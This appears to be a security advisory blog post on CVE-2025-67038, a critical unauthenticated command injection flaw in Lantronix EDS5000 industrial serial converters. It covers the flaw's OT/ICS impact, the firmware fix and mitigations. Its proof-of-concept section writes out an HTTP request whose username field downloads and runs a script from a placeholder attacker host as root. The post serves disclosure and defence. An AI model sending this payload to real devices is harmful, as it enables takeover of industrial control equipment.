CVE-2025-67038: Lantronix EDS5000 CVSS 9.8 Code Injection — CISA KEV, ICS/OT Alert, Federal Deadline Today
CISA issues urgent warning over critical CVSS 9.8 code injection in Lantronix industrial serial converters.
This post is part of the Week of June 26, 2026 Security Roundup.
Vulnerability Overview
CVE-2025-67038 is a critical code injection vulnerability (CWE-94) in the Lantronix EDS5000 Series — a serial-to-Ethernet converter widely deployed in industrial automation, operational technology (OT), and ICS environments. CVSS score: 9.8 Critical. CISA added it to the Known Exploited Vulnerabilities (KEV) catalog on June 23, 2026, with a federal agency remediation deadline of June 26, 2026 (today).
CVE: CVE-2025-67038 | CVSS: 9.8 Critical | CISA KEV: June 23, 2026 | FCEB Deadline: June 26, 2026
Technical Details
The Lantronix EDS5000 is a serial device server that allows serial-connected industrial equipment (PLCs, sensors, meters, robots) to be accessed and managed remotely over Ethernet. The vulnerability exists in the device's HTTP RPC module: when processing authentication attempts, the module takes the username parameter and concatenates it directly into a shell command for logging failed authentication events — without any sanitization. An attacker can inject OS metacharacters into the username field to execute arbitrary root commands, without needing valid credentials.
Proof-of-Concept Attack
POST /auth HTTP/1.1
Host: <target-ip>
Content-Type: application/x-www-form-urlencoded
username=admin%3Bwget+http%3A%2F%2F<attacker-ip>%2Fshell.sh+-O+%2Ftmp%2Fs%3Bash+%2Ftmp%2Fs%26&password=x
The shell command injected via the username parameter runs as root, enabling: downloading and executing payloads, establishing reverse shells, modifying device configuration to relay attacker traffic, pivoting to air-gapped OT/ICS networks reachable only via the serial-connected devices.
OT/ICS Impact
The EDS5000's role as a serial-to-Ethernet bridge makes this vulnerability particularly dangerous in OT environments. Compromising an EDS5000 can give attackers:
- Direct command and control over serial-connected PLCs, RTUs, and industrial controllers
- Ability to manipulate sensor readings fed to SCADA systems
- A pivot point into otherwise air-gapped control networks
- Potential for physical process disruption in manufacturing, utilities, and critical infrastructure
CISA specifically noted the potential for "loss or denial of control over industrial or automation assets" through manipulation of vulnerable devices.
Affected Versions and Fix
All Lantronix EDS5000 Series devices prior to firmware version 2.2.0.0R1. Lantronix released the fix and recommends immediate upgrade to EDS5000 version 2.2.0.0R1. Contact Lantronix support if automatic update mechanisms are unavailable in your OT environment.
Remediation
- Apply patch immediately: Upgrade to Lantronix EDS5000 firmware version 2.2.0.0R1.
- Network segmentation: Ensure EDS5000 management interfaces are not exposed to untrusted networks. Place them behind a firewall or jump server that restricts access to trusted IP ranges only.
- Disable HTTP management interface if not required — use SSH or physical console access instead.
- Inventory exposure: Search Shodan for
product:"Lantronix EDS5000"to identify internet-exposed instances in your organization. - If patching is not immediately possible in your OT environment, isolate the device from external network access as an emergency mitigation.
- Monitor for IOCs: Unexpected outbound connections, configuration changes, or unusual authentication log entries on EDS5000 devices.